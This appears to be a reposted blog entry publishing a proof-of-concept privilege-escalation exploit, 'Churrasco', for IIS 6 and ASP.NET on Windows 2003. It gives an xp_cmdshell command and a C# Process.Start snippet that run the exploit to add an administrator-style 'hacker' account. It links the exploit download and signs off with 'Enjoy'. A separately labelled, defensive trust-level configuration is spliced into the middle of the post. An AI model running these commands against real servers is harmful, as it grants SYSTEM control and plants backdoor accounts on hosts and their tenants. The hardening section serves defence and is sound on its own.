Critical vulnerability in IIS 6 + ASP.NET servers

    The day before yesterday a colleague found this vulnerability; today I tested it again on a friend's hosting space, and it really can run any command.

    So far MS has not released a patch. I expect China has just gained tens of thousands more zombie machines, and DDoS is going to get even heavier.

    It has been a long time since the Token Kidnapping presentation
    (http://www.argeniss.com/research/TokenKidnapping.pdf) was published, so I
    decided to release a PoC exploit for Win2k3 that allows to execute code
    under the SYSTEM account.

    Basically, if you can run code under any service in Win2k3 then you can
    own Windows; this is because Windows service accounts can
    impersonate.
    Other processes (not services) that can impersonate are IIS 6 worker
    processes, so if you can run code from an ASP .NET or classic ASP web
    application then you can own Windows too. If you provide shared
    hosting services then I would recommend not allowing users to run this
    kind of code from ASP.
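    A hardened configuration for the hosting recommendation above (an added example; it is not part of Cesar Cerrudo's post). ASP.NET code access security trust levels decide whether a web application may start processes: under Full trust, the default, System.Diagnostics.Process.Start is permitted, while Medium trust denies it with a SecurityException. The location lock shown is the documented way for a hoster to pin the level in the server-wide root web.config or machine.config so a tenant's own web.config cannot raise it; the file placement and the empty path value are assumptions about the hosting layout.

```xml
<!-- Added example: server-wide root web.config / machine.config for a
     shared IIS 6 host.

     Weak setting: every site runs under Full trust, so hosted ASP.NET
     code such as Process.Start(Server.MapPath("some.exe")) is allowed
     and a tenant can launch arbitrary binaries under the worker
     process identity.

     <system.web>
       <trust level="Full" originUrl="" />
     </system.web>
-->

<!-- Corrected setting: Medium trust denies Process.Start, unmanaged
     code, and file or registry access outside the application
     directory. allowOverride="false" stops an individual site's
     web.config from setting the level back to Full. -->
<configuration>
  <location path="" allowOverride="false">
    <system.web>
      <trust level="Medium" originUrl="" />
    </system.web>
  </location>
</configuration>
```

    To verify the lock, deploy a test page that calls Process.Start and confirm it fails with a SecurityException rather than running. Note the scope of this control: it stops untrusted tenant code from reaching the operating system, but it does not change the Windows impersonation behaviour the PoC relies on, so the identity the worker process runs under, and what else runs with it, still matters.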


    -SQL Server is a nice target for the exploit if you are a DBA and want
    to own Windows:

    exec xp_cmdshell 'churrasco "net user /add hacker"'


    -Exploiting IIS 6 with ASP .NET :
    ...
    System.Diagnostics.Process myP = new System.Diagnostics.Process();
    myP.StartInfo.RedirectStandardOutput = true;
    myP.StartInfo.FileName = Server.MapPath("churrasco.exe");
    myP.StartInfo.UseShellExecute = false;
    myP.StartInfo.Arguments = " \"net user /add hacker\" ";
    myP.Start();
    string output = myP.StandardOutput.ReadToEnd();
    Response.Write(output);
    ...


    You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

    Enjoy.
     Posted by Cesar Cerrudo at 4:10 PM
    Original source: https://www.cnblogs.com/LCX/p/1366374.html